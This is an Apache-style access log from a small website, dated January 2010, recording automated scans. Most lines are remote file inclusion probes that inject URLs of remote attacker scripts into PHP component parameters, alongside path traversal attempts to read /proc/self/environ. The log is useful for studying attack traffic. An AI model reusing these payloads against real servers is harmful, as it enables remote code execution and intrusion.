194.63.235.157 - - [24/Jan/2010:18:05:58 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:05:58 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:05:58 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:17 -0800] "GET /index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:17 -0800] "GET /logs/access_091228.log/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:17 -0800] "GET /index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:17 -0800] "GET /logs/access.log/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:19 -0800] "GET /logs/access.log/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:19 -0800] "GET /index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:20 -0800] "GET /index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
200.234.200.155 - - [24/Jan/2010:18:06:20 -0800] "GET /logs/access_091228.log/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:06:54 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:06:55 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:10:19 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:10:19 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:10:19 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:10:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:10:48 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:10:49 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [24/Jan/2010:18:17:47 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:17:53 -0800] "GET /logs//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:17:53 -0800] "GET /modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:17:55 -0800] "GET /logs/access_090921.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [24/Jan/2010:18:18:02 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:18:06 -0800] "GET /logs/access_090713.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:20:04 -0800] "GET /logs/access_090928.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:21:01 -0800] "GET /logs/access_090720.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:21:09 -0800] "GET /logs/access_090907.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:21:22 -0800] "GET /logs/access_090831.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:22:23 -0800] "GET /logs/access_090824.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [24/Jan/2010:18:24:59 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [24/Jan/2010:18:25:02 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [24/Jan/2010:18:25:07 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.234.2.95 - - [24/Jan/2010:18:25:23 -0800] "GET /logs/access_090727.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:25:57 -0800] "GET /logs/access_090810.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:25:57 -0800] "GET /logs/access_090810.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:26:54 -0800] "GET /logs/access_091116.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:26:54 -0800] "GET /logs/access_091116.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:26:55 -0800] "GET /logs/access_090706.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:27:00 -0800] "GET /logs/access_090817.log%20%20//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.145.141.36 - - [24/Jan/2010:18:28:36 -0800] "GET /logs/access_091207.log//Neos_Chronos/header.php?base_folder=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
193.145.141.36 - - [24/Jan/2010:18:28:36 -0800] "GET /Neos_Chronos/header.php?base_folder=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
193.145.141.36 - - [24/Jan/2010:18:28:36 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
193.145.141.36 - - [24/Jan/2010:18:28:40 -0800] "GET /logs/access_090706.log//Neos_Chronos/header.php?base_folder=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:28:50 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:29:13 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.71 - - [24/Jan/2010:18:31:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:31:40 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [24/Jan/2010:18:32:01 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:18:34:34 -0800] "GET /admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:18:34:34 -0800] "GET /logs//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:18:34:35 -0800] "GET /logs/access_100111.log%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.161.248.26 - - [24/Jan/2010:18:37:25 -0800] "GET /logs/access_090720.log/index.php?nic=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
65.161.248.26 - - [24/Jan/2010:18:37:25 -0800] "GET /index.php?nic=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
88.131.106.16 - - [24/Jan/2010:18:38:36 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [24/Jan/2010:18:38:37 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:18:44:18 -0800] "GET /modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.234.2.95 - - [24/Jan/2010:18:44:18 -0800] "GET /logs//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.234.2.95 - - [24/Jan/2010:18:44:21 -0800] "GET /logs/access.log//modules/Forums/admin/errors.php?error=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.207.71 - - [24/Jan/2010:18:45:04 -0800] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
193.145.141.36 - - [24/Jan/2010:18:52:38 -0800] "GET /logs/access_091207.log%20//Neos_Chronos/header.php?base_folder=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:02 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:02 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:03 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:11 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:11 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:11 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:28 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:29 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:29 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:30 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:30 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:30 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:46 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:48 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:48 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:53 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:53 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:54:53 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:55:27 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:55:27 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:55:27 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:55:29 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:55:29 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:18:55:31 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:55:31 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:55:31 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:55:31 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:55:33 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:55:33 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:55:33 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:56:05 -0800] "GET /logs/access_091026.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:56:06 -0800] "GET /logs/access_091026.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:57:09 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:57:09 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:57:09 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:57:15 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:57:16 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:57:16 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:57:56 -0800] "GET /logs/access_091026.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:18:58:11 -0800] "GET /logs/access_091026.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [24/Jan/2010:18:59:25 -0800] "GET /logs///index.php?option=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [24/Jan/2010:18:59:25 -0800] "GET //index.php?option=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [24/Jan/2010:18:59:25 -0800] "GET /logs/access_100104.log///index.php?option=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.144 - - [24/Jan/2010:19:01:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
122.201.102.68 - - [24/Jan/2010:19:06:43 -0800] "GET /logs/access_090720.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [24/Jan/2010:19:06:43 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 200 4812 "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [24/Jan/2010:19:06:43 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 200 1055 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.28 - - [24/Jan/2010:19:10:46 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; HbTools 4.8.2; Media Center PC 4.0)" "galf.org"
41.153.50.180 - - [24/Jan/2010:19:19:49 -0800] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0" "www.galf.org"
41.153.50.180 - - [24/Jan/2010:19:19:51 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0" "www.galf.org"
41.153.50.180 - - [24/Jan/2010:19:20:09 -0800] "GET /logs/access_090720.log HTTP/1.1" 200 1703936 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0" "www.galf.org"
222.232.119.252 - - [24/Jan/2010:19:25:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
222.232.119.252 - - [24/Jan/2010:19:25:11 -0800] "GET /skin/zero_vote/error.php?dir=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:19:45:14 -0800] "GET /logs/access.log%20%20/head.php?path=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:19:45:14 -0800] "GET /logs/head.php?path=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [24/Jan/2010:19:45:15 -0800] "GET /head.php?path=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.201 - - [24/Jan/2010:19:46:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
